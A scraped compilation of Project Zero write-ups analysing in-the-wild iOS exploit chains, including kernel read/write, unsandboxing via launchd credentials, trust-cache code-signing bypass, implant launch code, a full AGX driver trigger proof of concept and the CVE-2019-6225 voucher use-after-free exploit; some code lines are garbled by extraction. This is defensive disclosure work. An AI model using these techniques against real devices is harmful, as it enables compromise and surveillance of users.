  task_get_special_port(mach_task_self(), TASK_SEATBELT_PORT, &tfp0);
That's exactly what they do next, and that tfp0 mach port is a send right to the real kernel task port, allowing arbitrary kernel memory read/write via task port MIG methods like mach_vm_read and mach_vm_write.
What to do with a kernel task port?They use the allprocs offset to get the head of the linked list of running processes then iterate through the list looking for two processes by PID:

void PE1_unsandbox() {  char struct_proc[512] = {0};
  if (offset_allproc)  {    uint64_t launchd_ucred = 0;    uint64_t our_struct_proc = 0;
    uint64_t allproc = kernel_runtime_base + offset_allproc;    uint64_t proc = kread64(allproc);
    do {      kread_overwrite(proc, struct_proc, 0x48);
      uint32_t pid = *(uint32_t*)(struct_proc + 0x10);
      if (pid == 1) { // launchd has pid 1        launchd_ucred = *(_QWORD *)&struct_proc[0x100];      }
      if ( getpid() == pid ) {        our_struct_proc = proc;      }
      if (our_struct_proc && launchd_ucred) {        break;      }
      proc = *(uint64_t*)(struct_proc+0x0);      if (!proc) {        break;      }    } while (proc != allproc && pid);
    // unsandbox themselves    kwrite64(our_struct_proc + 0x100, launchd_ucred);  }}
They're looking for the proc structures for launchd and the current task (which is WebContent, running in the Safari renderer sandbox.) From the proc structure they read the pid as well as the ucred pointer.

As well as containing the POSIX credentials (which define the uid, gid and so on) the ucred also contains a pointer to a MAC label, which is used to define the sandbox which is applied to a process.

Using the kernel memory write they replace the current tasks's ucreds pointer with launchd's.  This has the effect of unsandboxing the current process; giving it the same access to the system as launchd.

There are two more hurdles to overcome before they're able to launch their implant: the platform policy and code-signing.Platform policyEvery process on iOS restricted by the platform policy sandbox profile; it enforces an extra layer of "system wide" sandboxing. The platform policy bytecode itself lies in the __const region of the and is thus protected by KPP or KTRR. However, the pointer to the platform policy bytecode resides in a structure allocated via IOMalloc, and is thus in writable memory. The attackers make a complete copy of the platform policy bytecode and replace the pointer in the heap-allocated structure with a pointer to the copy. In the copy they patch out the process-exec and process-exec-interpreter hooks; here's a diff of the decompiled policies (generated with sandblaster):

    (require-not (global-name ""))    (require-not (global-name ""))    (require-not (global-name ""))))-   (deny process-exec*-    (require-all-     (require-all       (require-not          (subpath "/private/var/run/"))-      (require-not (literal "/private/var/factory_mount/"))-      (require-not (subpath "/private/var/containers/Bundle"))-      (require-not (literal "/private/var/personalized_automation/"))-      (require-not (literal "/private/var/personalized_factory/"))-      (require-not (literal "/private/var/personalized_demo/"))-      (require-not (literal "/private/var/personalized_debug/"))-      (require-not (literal "/Developer/")))-     (subpath "/private/var")-     (require-not (debug-mode))))-   (deny process-exec-interpreter-    (require-all-     (require-not (debug-mode))-     (require-all (require-not (literal "/bin/sh"))-      (require-not (literal "/bin/bash"))-      (require-not (literal "/usr/bin/perl"))-      (require-not (literal "/usr/local/bin/scripter"))-      (require-not (literal "/usr/local/bin/luatrace"))-      (require-not (literal "/usr/sbin/dtrace")))))    (deny system-kext-query     (require-not (require-entitlement "")))    (deny system-privilege
As the platform policy changes over time their platform policy bytecode patches become more elaborate but the fundamental idea remains the same.
Code signing bypassJailbreaks typically bypass iOS's mandatory code signing by making changes to amfid (Apple Mobile File Integrity Daemon) which is a userspace daemon responsible for verifying code signatures. An example of an early form of such a change was to modify the amfid GOT such that a function which was called to verify a signature (MISValidateSignature) was replaced with a call to a function which always returned 0; thereby allowing all signatures, even those which were invalid.

There's another approach though, which has been used increasingly by recent jailbreaks. The kernel also contains an array of known-trusted hashes. These are hashes of code-signature blobs (also known as CDHashes) which are to be implicitly trusted. This design makes sense because those hashes will be part of the kernel's code signature; thus still tied to Apple's root-of-trust.

The weakness, given an attacker with kernel memory read write, is that this trust cache data-structure is mutable. There are occasions when more hashes will be added to it at runtime. It's modified, for example, when the DeveloperDiskImage.dmg is mounted on an iPhone if you do app development. During app development native tools like lldb-server which run on the device have their code-signature blob hashes added to the trust cache. 

Since the attackers only wish to execute their implant binary and not disable code-signing system wide, it suffices to simply add the hash of their implant's code-signing blob to the kernel dynamic trust cache, which they do using the kernel task port.Launching implantThe final stage is to drop and spawn the implant binary. They do this by writing the implant Mach-O to disk under /tmp, then calling posix_spawn to execute it:

  FILE* f = fopen("/tmp/updateserver", "w+");  if (f) {    fwrite(buf, 1, buf_size, f);    fclose(f);    chmod("/tmp/updateserver", 0755);    pid_t pid = 0;    char* argv[] = {"/tmp/updateserver", NULL};    posix_spawn(&pid,                "/tmp/updateserver",                NULL,                NULL,                &argv,                environ);  }

This immediately starts the implant running as root. The implant will remain running until the device is rebooted, communicating every 60 seconds with a command-and-control server asking for instructions for what information to steal from the device. We'll cover the complete functionality of the implant in a later post.Appendix ATrigger for variantBy undefining IS_12_B1 you will get the initial trigger.The create_shmem selector changed from 6 to 5 in iOS 11. The unpatched variant was still present in iOS 12 beta 1 but no longer reproduces in 12.1.1. It does reproduce on at least 11.1.2, 11.3.1 and 11.4.1.

#include <stdio.h>#include <stdlib.h>#include <string.h>#include <pthread.h>
#include <mach/mach.h>#include <CoreFoundation/CoreFoundation.h>
#include "command_buffers.h"
typedef mach_port_t task_port_t;typedef mach_port_t io_service_t;typedef mach_port_t io_connect_t;
externconst mach_port_t kIOMasterPortDefault;
kern_return_tIOServiceOpen(              io_service_t    service,              task_port_t     owningTask,              uint32_t        type,              io_connect_t  * connect );
CFMutableDictionaryRefIOServiceMatching(                  const char *    name ) CF_RETURNS_RETAINED;
io_service_tIOServiceGetMatchingService(                            mach_port_t     masterPort,                            CFDictionaryRef matching CF_RELEASES_ARGUMENT);
kern_return_tIOConnectCallMethod(                    mach_port_t      connection,       // In                    uint32_t         selector,       // In                    const uint64_t  *input,         // In                    uint32_t         inputCnt,       // In                    const void      *inputStruct,         // In                    size_t           inputStructCnt,       // In                    uint64_t        *output,         // Out                    uint32_t        *outputCnt,         // In/Out                    void            *outputStruct,         // Out                    size_t          *outputStructCnt);      // In/Out
kern_return_tIOConnectCallAsyncMethod(                         mach_port_t      connection,       // In                         uint32_t         selector,       // In                         mach_port_t      wake_port,       // In                         uint64_t        *reference,         // In                         uint32_t         referenceCnt,       // In                         const uint64_t  *input,         // In                         uint32_t         inputCnt,       // In                         const void      *inputStruct,         // In                         size_t           inputStructCnt,       // In                         uint64_t        *output,         // Out                         uint32_t        *outputCnt,         // In/Out                         void            *outputStruct,         // Out                         size_t          *outputStructCnt);      // In/Out
typedef struct IONotificationPort * IONotificationPortRef;
IONotificationPortRefIONotificationPortCreate(                         mach_port_t             masterPort );
mach_port_tIONotificationPortGetMachPort(                              IONotificationPortRef   notify );
kern_return_tIOConnectAddClient(                   io_connect_t    connect,                   io_connect_t    client );

#define IS_12_B1 1
#ifdef IS_12_B1#define AGX_SHARED_CREATE_SHMEM 5#else#define AGX_SHARED_CREATE_SHMEM 6#endifstruct agx_shared_create_shmem_struct_out {  void* base;  uint32_t size;  uint32_t id;};
struct submit_command_buffers_struct_input {  uint32_t field_0;  uint32_t field_1;  uint32_t resource_id_0;  uint32_t resource_id_1;  uint64_t field_4;  uint64_t field_5;};
struct async_reference {  mach_port_t port;  void(*fptr)(void);  uint64_t something;};
void null_sub(void) {return;};
void* IOSurfaceCreate(void*);uint32_t IOSurfaceGetID(void*);
uint32_t allocate_global_iosurface_and_return_id() {  CFMutableDictionaryRef dict = CFDictionaryCreateMutable(NULL, 0, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);  int alloc_size_raw_value = 1024;  CFNumberRef alloc_size_cfnum = CFNumberCreate(NULL, kCFNumberSInt32Type, &alloc_size_raw_value);    CFDictionarySetValue(dict, CFSTR("IOSurfaceAllocSize"), alloc_size_cfnum);  CFDictionarySetValue(dict, CFSTR("IOSurfaceIsGlobal"), kCFBooleanTrue);    int pixel_format_raw_value = 0;  CFNumberRef pixel_format_cfnum = CFNumberCreate(NULL, kCFNumberSInt32Type, &pixel_format_raw_value);  CFDictionarySetValue(dict, CFSTR("IOSurfacePixelFormat"), pixel_format_cfnum);    void* iosurface = IOSurfaceCreate(dict);  if (iosurface == NULL) {    printf("failed to create IOSurface\n");    return 0;  }  printf("allocated IOSurface: %p\n", iosurface);    uint32_t id = IOSurfaceGetID(iosurface);  printf("id: 0x%x\n", id);  return id;}
void* racer_thread(void* arg) {  volatile uint32_t* ptr = arg;  uint32_t orig = *ptr;  printf("racing, original value: %d\n", orig);  while (1) {    *ptr = 0x40;    *ptr = orig;  }  return NULL;}
void do_it(void) {  kern_return_t err;      io_service_t agx_service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOGraphicsAccelerator2"));  if (agx_service == MACH_PORT_NULL) {    printf("failed to get service port\n");    return;  }  printf("got service: %x\n", agx_service);    io_connect_t shared_user_client_conn = MACH_PORT_NULL;    err = IOServiceOpen(agx_service, mach_task_self(), 2, &shared_user_client_conn);  if (err != KERN_SUCCESS) {    printf("open of type 2 failed\n");    return;  }  printf("got connection: 0x%x\n", shared_user_client_conn);    // allocate two shmem's:  uint64_t shmem_size = 0x1000;  struct agx_shared_create_shmem_struct_out shmem0_desc = {0};  size_t shmem_result_size = sizeof(shmem0_desc);  err = IOConnectCallMethod(shared_user_client_conn, AGX_SHARED_CREATE_SHMEM, &shmem_size, 1, NULL, 0, NULL, NULL, &shmem0_desc, &shmem_result_size);  if (err != KERN_SUCCESS) {    printf("external method create_shmem failed: 0x%x\n", err);    return;  }  printf("create shmem success!\n");  printf("base: %p size: 0x%x id: 0x%x\n", shmem0_desc.base, shmem0_desc.size,;    memset(shmem0_desc.base, 0, shmem0_desc.size);    shmem_size = 0x1000;  struct agx_shared_create_shmem_struct_out shmem1_desc = {0};  err = IOConnectCallMethod(shared_user_client_conn, AGX_SHARED_CREATE_SHMEM, &shmem_size, 1, NULL, 0, NULL, NULL, &shmem1_desc, &shmem_result_size);  if (err != KERN_SUCCESS) {    printf("external method create_shmem failed: 0x%x\n", err);    return;  }  printf("create shmem success!\n");  printf("base: %p size: 0x%x id: 0x%x\n", shmem1_desc.base, shmem1_desc.size,;    IONotificationPortRef notification_port_ref = IONotificationPortCreate(kIOMasterPortDefault);  mach_port_t notification_port_mach_port = IONotificationPortGetMachPort(notification_port_ref);    io_connect_t agx_command_queue_userclient = MACH_PORT_NULL;  err = IOServiceOpen(agx_service, mach_task_self(), 5, &agx_command_queue_userclient);  if (err != KERN_SUCCESS) {    printf("failed to open type 5\n");    return;  }  printf("got agx command queue user client: 0x%x\n", agx_command_queue_userclient);    err = IOConnectAddClient(agx_command_queue_userclient, shared_user_client_conn);  if (err != KERN_SUCCESS) {    printf("failed to connect command queue and shared user client: 0x%x\n", err);    return;  }  printf("connected command queue\n");    struct async_reference async_ref = {0};  async_ref.port = notification_port_mach_port;  async_ref.fptr = null_sub;      err = IOConnectCallAsyncMethod(agx_command_queue_userclient, 0, notification_port_mach_port, (uint64_t*)&async_ref, 1, NULL, 0, NULL, 0, NULL, NULL, NULL, NULL);  if (err != KERN_SUCCESS) {    printf("failed to call async selector 0\n");    return ;  }    printf("called async selector 0\n");
  for (int loop = 0; loop < 20; loop++) {    uint32_t global_surface_id = allocate_global_iosurface_and_return_id();        // create a resource with that:    uint8_t* input_buf = calloc(1, 1024);    *((uint32_t*)(input_buf+0)) = 0x82;    *((uint32_t*)(input_buf+0x18)) = 1;    *((uint32_t*)(input_buf+0x30)) = global_surface_id;
        uint8_t* output_buf = calloc(1, 1024);        size_t output_buffer_size = 1024;        err = IOConnectCallMethod(shared_user_client_conn, 0, NULL, 0, input_buf, 1024, NULL, 0, output_buf, &output_buffer_size);    if (err != KERN_SUCCESS) {      printf("new_resource failed: 0x%x\n", err);      return;    }    printf("new_resource success!\n");        // try to build the command buffer structure:#ifdef IS_12_B1    int target_size = 0x200;#else    int target_size = 0x800;#endif    int n_entries = target_size / 0x30;        uint8_t* cmd_buf = (uint8_t*)shmem1_desc.base;        *((uint32_t*)(cmd_buf+0x8)) = 1;    *((uint32_t*)(cmd_buf+0x24)) = n_entries; // n_entries??    #ifdef IS_12_B1    if (loop == 0) {      pthread_t th;      pthread_create(&th, NULL, racer_thread, (cmd_buf+0x24));      usleep(50*1024);    }#endif
        int something = (target_size+8) % 0x30 / 8;
#ifdef IS_12_B1    for (int i = 0; i < n_entries+20; i++) {#else    for (int i = 0; i < n_entries; i++) {#endif      uint8_t* base = cmd_buf + 0x28 + (i*0x40);      for (int j = 0; j < 7; j++) {        *((uint32_t*)(base+(j*4))) = 3; // resource_id?        *((uint16_t*)(base+(0x30)+(j*2))) = 1;      }      if (i > something) {        *((uint16_t*)(base+0x3e)) = 6;      } else {#ifdef IS_12_B1        // this is not the overflow we're targeting here        *((uint16_t*)(base+0x3e)) = 6;#else        *((uint16_t*)(base+0x3e)) = 7;#endif      }    }        struct submit_command_buffers_struct_input cmd_in = {0};    cmd_in.field_1 = 1;    cmd_in.resource_id_0 =; // 1    cmd_in.resource_id_1 =; // 2        // s_submit_command_buffers:    err = IOConnectCallMethod(agx_command_queue_userclient, 1, NULL, 0, &cmd_in, sizeof(cmd_in), NULL, NULL, NULL, NULL);        printf("s_submit_command_buffers returned: %x\n", err);
    // delete_resource:    uint64_t three = 3;    err = IOConnectCallMethod(shared_user_client_conn, 1, &three, 1, NULL, 0, NULL, NULL, NULL, NULL);    printf("delete_resource returned: %x\n", err);        //  }}
Kategorie: Hacking & Security

In-the-wild iOS Exploit Chain 5

30 Srpen, 2019 - 02:04
Posted by Ian Beer, Project Zero


This exploit chain is a three way collision between this attacker group, Brandon Azad from Project Zero, and @S0rryMybad from 360 security.

On November 17th 2018, @S0rryMybad used this vulnerability to win $200,000 USD at the TianFu Cup PWN competition. Brandon Azad independently discovered and reported the same issue to Apple on December 6th, 2018. Apple patched this issue on January 22, 2019, with both @S0rryMyBad and Brandon credited in the release notes for iOS 12.1.4 (CVE-2019-6225). It even won a pwnie at Blackhat 2019 for best privilege escalation bug!  

So, why did the attackers, who already possessed then-functioning iOS Exploit Chain 4 (that contained the 0-days reported to Apple in February 2019), leave that chain and move to this brand new exploit chain? Probably because it was far more reliable, used only one vulnerability rather than the collection of vulnerabilities, and avoided the pitfalls inherent in the thread-based reallocation technique used for the sandbox escape in iOS Exploit Chain 4. 

The more important takeaway, however, is what the vulnerability was. In 2014, Apple added an unfinished implementation of a new feature named “vouchers” and part of this new code was a new syscall (technically, a task port MIG method) which, from what I can tell, never worked. To be clear, if there had been a test which called the syscall with the expected arguments, it would have caused a kernel panic. If any Apple developer had attempted to use this feature during those four years, their phone would have immediately crashed.

In this detailed writeup, we'll look at exactly how the attackers exploited this issue to install their malicious implant and monitor user activity on the devices. My next writeup is on the implant itself, including command and control and a demonstration of its surveillance capabilities.In-the-wild iOS Exploit Chain 5 - task_swap_mach_vouchertargets: 5s through X, 11.4.1 through 12.1.2
first unsupported version 12.1.3 - 22 Jan 2019
iPhone6,1 (5s, N51AP)iPhone6,2 (5s, N53AP)iPhone7,1 (6 plus, N56AP)iPhone7,2 (6, N61AP)iPhone8,1 (6s, N71AP)iPhone8,2 (6s plus, N66AP)iPhone8,4 (SE, N69AP)iPhone9,1 (7, D10AP)iPhone9,2 (7 plus, D11AP)iPhone9,3 (7, D101AP)iPhone9,4 (7 plus, D111AP)iPhone10,1 (8, D20AP)iPhone10,2 (8 plus, D21AP)iPhone10,3 (X, D22AP)iPhone10,4 (8, D201AP)iPhone10,5 (8 plus, D211AP)iPhone10,6 (X, D221AP)

15G77 (11.4.1 - 9 Jul 2018)16A366 (12.0 - 17 Sep 2018)16A404 (12.0.1 - 8 Oct 2018)16B92 (12.1 - 30 Oct 2018)16C50 (12.1.1 - 5 Dec 2018)16C10 (12.1.2 - 17 Dec 2018)VouchersVouchers were a feature introduced with iOS 8 in 2014. The vouchers code seems to have landed without being fully implemented, indicated by the comment above the vulnerable code:

/* Placeholders for the task set/get voucher interfaces */kern_return_t task_get_mach_voucher(  task_t                 task,  mach_voucher_selector_ __unused which,  ipc_voucher_t*         voucher){  if (TASK_NULL == task)    return KERN_INVALID_TASK;
  *voucher = NULL;  return KERN_SUCCESS;}
kern_return_t task_set_mach_voucher(  task_t                 task,  ipc_voucher_t __unused voucher){  if (TASK_NULL == task)    return KERN_INVALID_TASK;
  return KERN_SUCCESS;}
kern_return_ttask_swap_mach_voucher(  task_t         task,  ipc_voucher_t  new_voucher,  ipc_voucher_t* in_out_old_voucher){  if (TASK_NULL == task)    return KERN_INVALID_TASK;
  *in_out_old_voucher = new_voucher;  return KERN_SUCCESS;}
You're not alone if you can't immediately spot the bug in the above snippet; it remained in the codebase and on all iPhones since 2014, reachable from the inside of any sandbox. You would have triggered it though if you had ever tried to use this code and called task_swap_mach_voucher with a valid voucher. Within those four years, it’s almost certain that no code was ever written to actually use the task_swap_mach_voucher feature, despite it being reachable from every sandbox.

It was likely never called once, not during development, testing, QA or production (because otherwise it would have caused an immediate kernel panic and forced a reboot). I can only assume that it slipped through code review, testing and QA. task_swap_mach_voucher is a kernel MIG method on a task port; it also cannot be disabled by the iOS sandbox, further compounding this error.

To see why there's actually a bug here, we need to look one level deeper at the MIG auto-generated code which calls task_swap_mach_voucher:

Here's the relevant MIG definitions for task_swap_mach_voucher:

routine task_swap_mach_voucher(                               task        : task_t;                               new_voucher : ipc_voucher_t;                         inout old_voucher : ipc_voucher_t);

/* IPC voucher internal object */type ipc_voucher_t = mach_port_t     intran: ipc_voucher_t convert_port_to_voucher(mach_port_t)     outtran: mach_port_t convert_voucher_to_port(ipc_voucher_t)     destructor: ipc_voucher_release(ipc_voucher_t);
Here's an annotated version of the autogenerated code which you get after running the MIG tool, and the XNU methods it calls:

What's the fundamental cause of this vulnerability? It's probably that MIG is very hard to use and the only way to safely use it is to very carefully read the auto-generated code. If you search for documentation on how to use MIG correctly, there just isn't any publicly available.

The takeaway here is that whilst the underlying cause of the vulnerability may be obscure, the fact remains that triggering and finding it is incredibly simple.

Again, unfortunately, these concerns aren't theoretical; this exact issue was being exploited in the wild.ExploitationTo understand the exploit for this bug we need to understand something about what a mach voucher actually is. Brandon Azad nicely sums it up in his post: "an IPC voucher represents a set of arbitrary attributes that can be passed between processes via a send right in a Mach message."

Concretely, a voucher is represented in the kernel by the following structure:

/* * IPC Voucher * * Vouchers are a reference counted immutable (once-created) set of * indexes to particular resource manager attribute values * (which themselves are reference counted). */struct ipc_voucher {  iv_index_t    iv_hash;   /* checksum hash */  iv_index_t    iv_sum;   /* checksum of values */  os_refcnt_t   iv_refs;   /* reference count */  iv_index_t    iv_table_size;  /* size of the voucher table */  iv_index_t    iv_inline_table[IV_ENTRIES_INLINE];  iv_entry_t    iv_table;   /* table of voucher attr entries */  ipc_port_t    iv_port;   /* port representing the voucher */  queue_chain_t iv_hash_link;   /* link on hash chain */};
By supplying "recipes" to the host_create_mach_voucher host port MIG method you can create vouchers and get send rights to then mach ports representing those vouchers. Another important point is that vouchers are meant to be unique; for a given set of keys and values there is exactly one mach port representing them; providing the same set of keys and values in another recipe should yield the same voucher and voucher port.

Vouchers are allocated from their own zone (ipc_voucher_zone) and they are reference counted objects with the reference count stored in the iv_refs field.

Since an exploit targeting a use-after-free vulnerability in mach vouchers is likely to have to create many vouchers, Brandon's exploit created USER_DATA vouchers, a type that contains user-controlled data such that he could always ensure a new voucher was created:

static mach_port_tcreate_voucher(uint64_t id) {  assert(host != MACH_PORT_NULL);  static uint64_t uniqueness_token = 0;  if (uniqueness_token == 0) {    uniqueness_token = (((uint64_t)arc4random()) << 32) | getpid();  }
  mach_port_t voucher = MACH_PORT_NULL;
#pragma clang diagnostic push#pragma clang diagnostic ignored "-Wgnu-variable-sized-type-not-at-end"  struct __attribute__((packed)) {    mach_voucher_attr_recipe_data_t user_data_recipe;    uint64_t user_data_content[2];  } recipes = {};#pragma clang diagnostic pop
  recipes.user_data_recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;  recipes.user_data_recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;  recipes.user_data_recipe.content_size = sizeof(recipes.user_data_content);  recipes.user_data_content[0] = uniqueness_token;  recipes.user_data_content[1] = id;  kern_return_t kr = host_create_mach_voucher(    host,    (mach_voucher_attr_raw_recipe_array_t) &recipes,    sizeof(recipes),    &voucher);  assert(kr == KERN_SUCCESS);  assert(MACH_PORT_VALID(voucher));  return voucher;}
Both @S0rryMybad and the attackers instead realised that ATM vouchers created with the following recipe are always unique. This same structure is used in both @S0rryMybad's PoC and the in-the-wild exploit:

mach_voucher_attr_recipe_data_t atm_data = {  .key = MACH_VOUCHER_ATTR_KEY_ATM,  .command = 510}Exploit strategyAs usual they determine whether this is a 4k or 16k device via the hw.memsize sysctl. They create a new, suspended thread and get its thread port; they'll use this later.

They will again use the pipe buffer technique so they increase the open file limit and allocate 0x800 pipes. They allocate two sets of ports (ports_a, ports_b) and two standalone ports.

They allocate an ATM voucher; they'll use this right at the end. They force a GC, using the memory pressure technique again.

They allocate 0x2000 "before" vouchers; they're ATM vouchers which means they're all unique; this will allocate large regions of new ipc_voucher structure and new ipc_ports.

for ( k = 0; k < 0x2000; ++k ) {  host_create_mach_voucher(mach_host_self(),                           voucher_recipe,                           0x10,                           &before_voucher_ports[k]);}
They allocate a target voucher:

host_create_mach_voucher(mach_host_self(), voucher_recipe, 0x10, &target_voucher_port);
They allocate 0x1000 "after" vouchers:

for ( k = 0; k < 0x1000; ++k ) {  host_create_mach_voucher(mach_host_self(),                           voucher_recipe,                           0x10,                           &after_voucher_ports[k]);}
They're trying here to get the target voucher on a page where they also control the lifetime of all the other vouchers on a page; this is similar to the ipc_port UaF techniques:

They assign the voucher port to the sleeping thread via thread_set_mach_voucher.
This increases the reference count of the voucher to 2; one held by the port, and one held by the thread:

thread_set_mach_voucher(sleeping_thread_mach_port, target_voucher_port);

They trigger the vuln:

old_voucher = MACH_PORT_NULL;task_swap_mach_voucher(mach_task_self(),                       target_voucher_port,                       &old_voucher);
Again, I want to emphasize that there's absolutely nothing special about this trigger code; this is the intended way to use this API.

After this point there are two reference-counted pointers to the voucher (one from the mach port to the voucher, the other from the sleeper thread's struct thread) but the voucher only has one reference.

They destroy the before ports:

for (m = 4096; m < 0x2000; ++m) {  mach_port_destroy(mach_task_self(), before_voucher_ports[m]);}
then the target port:

mach_port_destroy(mach_task_self(), target_voucher_port);
and finally the after ports:

for (m = 4096; m < 0x1000; ++m) {  mach_port_destroy(mach_task_self(), after_voucher_ports[m]);}
Since the target voucher object one had one reference remaining, destroying the target_voucher_port will free the voucher as the reference count goes to zero, but the sleeper thread's ith_voucher field will still point to the now-free'd voucher.

They force a zone GC, making the page containing the voucher available to reallocated by another zone.

They send 80MB of page-sized out-of-line memory descriptors in mach messages; each of which contains repeating fake, empty voucher structures with an iv_refs field set to 0x100 and all other fields set to 0:

These are sent in 20 messages, one each to the first 20 ports in ports_a.

They allocate another 0x2000 ports, discloser_before_ports.

They allocate a neighbour target port and set the context value to 0x1337733100; it's at first unclear why they do this but the reason will become clear in the end.

They then call thread_get_mach_voucher, passing the sleeper thread's thread port:

discloser_mach_port = MACH_PORT_NULL;thread_get_mach_voucher(sleeping_thread_mach_port, 0, &discloser_mach_port);
Here's the kernel-side implementation of that method; recall that ith_voucher is a dangling pointer to the voucher, and they tried to replace what it points to with the out-of-line memory descriptor buffers:

kern_return_t thread_get_mach_voucher(  thread_act_t            thread,  mach_voucher_selector_t __unused which,  ipc_voucher_t*          voucherp){  ipc_voucher_t voucher;  mach_port_name_t voucher_name;
  if (THREAD_NULL == thread)    return KERN_INVALID_ARGUMENT;
  thread_mtx_lock(thread);  voucher = thread->ith_voucher;  // read the dangling pointer                                  // which should now point in to an OOL desc                                  // backing buffer
  /* if already cached, just return a ref */  if (IPC_VOUCHER_NULL != voucher) {    ipc_voucher_reference(voucher);    thread_mtx_unlock(thread);    *voucherp = voucher;    return KERN_SUCCESS;  }...
The autogenerated MIG wrapper will then call convert_voucher_to_port on that returned (dangling) voucher pointer:

RetCode = thread_get_mach_voucher(thr_act, In0P->which, &voucher);thread_deallocate(thr_act);if (RetCode != KERN_SUCCESS) {  MIG_RETURN_ERROR(OutP, RetCode);}...OutP-> = (mach_port_t)convert_voucher_to_port(voucher);
Here's convert_voucher_to_port:

ipc_port_tconvert_voucher_to_port(ipc_voucher_t voucher){  ipc_port_t port, send;
  if (IV_NULL == voucher)    return (IP_NULL);
  /* create a port if needed */  port = voucher->iv_port;  if (!IP_VALID(port)) {    port = ipc_port_alloc_kernel();    ipc_kobject_set_atomically(port, (ipc_kobject_t) voucher, IKOT_VOUCHER);...    /* If we lose the race, deallocate and pick up the other guy's port */    if (!OSCompareAndSwapPtr(IP_NULL, port, &voucher->iv_port)) {      ipc_port_dealloc_kernel(port);      port = voucher->iv_port;    }  }
  ip_lock(port);  send = ipc_port_make_send_locked(port);...  return (send);}
The ipc_voucher structure which is being processed here is in reality now backed by one of the out-of-line memory descriptor backing buffers they sent to the ports_a ports. Since they set all the fields apart from the reference count to 0 the iv_port field will be NULL. That means the kernel will allocate a new port (via ipc_port_alloc_kernel()) then write that ipc_port pointer into the voucher object. OSCompareAndSwap will set the voucher->iv_port field to port:

    if (!OSCompareAndSwapPtr(IP_NULL, port, &voucher->iv_port)) { ...
If everything up until now has worked, this will have the effect of writing the voucher port's address into the out-of-line memory descriptor buffer.

They allocate another 0x1000 ports, again trying to ensure ownership of the whole page surrounding the neighbour and fake voucher ports:

for ( ll = 0; ll < 0x1000; ++ll ) {  mach_port_allocate(mach_task_self(), 1, &discloser_after_ports[ll]);}

Let's look diagrammatically at what's going on:

They receive the out-of-line memory descriptors until they see one which has something that looks like a kernel pointer in it; they check that the iv_refs field is 0x101 (they set it to 0x100, and the creation of the new voucher port added an extra reference). If such a port is found they reallocate the out-of-line descriptor memory again, but this time they bump up the ipc_port pointer to point to the start of the next 16k page:

They destroy all the discloser_before and discloser_after ports then force a GC. The reason for moving the iv_port field up by 16k is because when the iv_port field was overwritten they leaked a reference to the fake voucher port, so that zone chunk wouldn't be collected (even if they also free'd the neighbour port, which they didn't do.) But now, the memory pointed to by the fake voucher's iv_port field is available to be reused by a different zone.

At this point they've got the two prerequisites for their kernel read-write primitive: a controllable pointer to an ipc_port, and knowledge of a kernel address where their spray may end up. From here on, they proceed as they did with their previous exploit chains.PipesThey build their fake pid_for_task kernel port in 0x800 4k pipe buffers. Since they know the iv_port pointer points to a 4k boundary they build the fake port structure in the lower half of the pipe buffer, and in the upper half at offset +0x800 they write the index of pipe fd to which this fake port was written, setting up the fake port to read from that address:

voidfill_buf_with_simple_kread_32_port(uint64_t buf,                                   uint64_t kaddr_of_dangling_port,                                   uint64_t read_target){  char* fake_port = (char*)buf;  *(uint32_t*)(buf + 0x00) = 0x80000002;   // IO_ACTIVE | IKOT_TASK  *(uint32_t*)(buf + 0x04) = 10;           // io_refs  *(uint32_t*)(buf + 0x68) = kaddr_of_dangling_port + 0x100;  *(uint32_t*)(buf + 0xA0) = 10;
  char* fake_task = buf+0x100;
  *(uint32_t*)(fake_task + 0x010) = 10;  *(uint64_t*)(fake_task + 0x368) = read_target - 0x10;}

  fill_buf_with_simple_kread_32_port(buf,                                     target_port_next_16k_page,                                     target_port_next_16k_page + 0x800);
  magic = 0x88880000;
  for (int i = 0; i < 0x800; i++) {    *(uint32_t*)&buf[2048] = i + magic;    write(pipe_fds[2 * i + 1], buf, 0xfff);  }

They call thread_get_mach_voucher, which will return a send right to the fake task port in one of the pipe buffers, then they call pid_for_task, which will perform the kread32 primitive, reading the u32 value written at offset +0x800 in the replacer pipe buffer:

  thread_get_mach_voucher(sleeping_thread_mach_port,                          0,                          &discloser_mach_port);  replacer_pipe_value = 0;  pid_for_task(discloser_mach_port, &replacer_pipe_value);  if ((replacer_pipe_index & 0xFFFF0000) == magic ) {    ...
From the magic value they're able to determine the file descriptor which corresponds to the pipe buffer which replaced the port memory. They now have all the requirements for the simple kread32 primitive.

They use the kread32 to search in the vicinity of the originally disclosed fake voucher port address for an ipc_port structure with an ip_context value of 0x1337733100. This is the context value which they gave neighbour port right at the start. The search proceeds outwards from the disclosed port address; if they find it they read the field at +0x60 in the ipc_port, which is the ip_receiver field.

The receive right for this port is owned by this task, so the ipc_port's ip_receiver field will point to their task's struct ipc_space. They read the pointer at offset +0x28, which points to their task structure. They read the task structure's proc pointer then traverse the doubly-linked list of processes backwards until they find a value where the lower 21 bits match the offset of the allproc list head, which they read from the offsets object for this device they loaded at the start. Once that's found they can determine the KASLR slide by subtracting the unslid value of the allproc symbol from the runtime observed value.

With the KASLR slide they are able to read the kernel_task pointer and find the address of the kernel vm_map. This is all they require to build the standard fake kernel task in the pipe buffer, giving them kernel memory read/write.
UnsandboxingThey traverse the allproc linked list of processes looking for their own process and launchd. They temporarily assign themselves launchd's credential structures, thereby inheriting launchd's sandbox profile. They patch the platform policy sandbox profile bytecode in memory. They read the embedded implant from the __DATA:__file segment section, compute the CDHash and add the CDHash to the trustcache using the kernel arbitrary write.

They drop the implant payload binary in /tmp/updateserver and execute it via posix_spawn.

They mark the devices as compromised by setting the value of the kern.maxfilesperproc sysctl to 0x27ff. CleanupThey no longer need the fake kernel task port, so it's destroyed. The fake kernel task port had a reference count of 0x2000, so it won't be freed. They close all the pipes, and return. They ping an HTTP server to indicate successful compromise of another target.
Kategorie: Hacking & Security

In-the-wild iOS Exploit Chain 3

30 Srpen, 2019 - 02:04
Posted by Ian Beer, Project Zero


This chain targeted iOS 11-11.4.1, spanning almost 10 months. This is the first chain we observed which had a separate sandbox escape exploit.

The sandbox escape vulnerability was a severe security regression in libxpc, where refactoring lead to a < bounds check becoming a != comparison against the boundary value. The value being checked was read directly from an IPC message, and used to index an array to fetch a function pointer.  

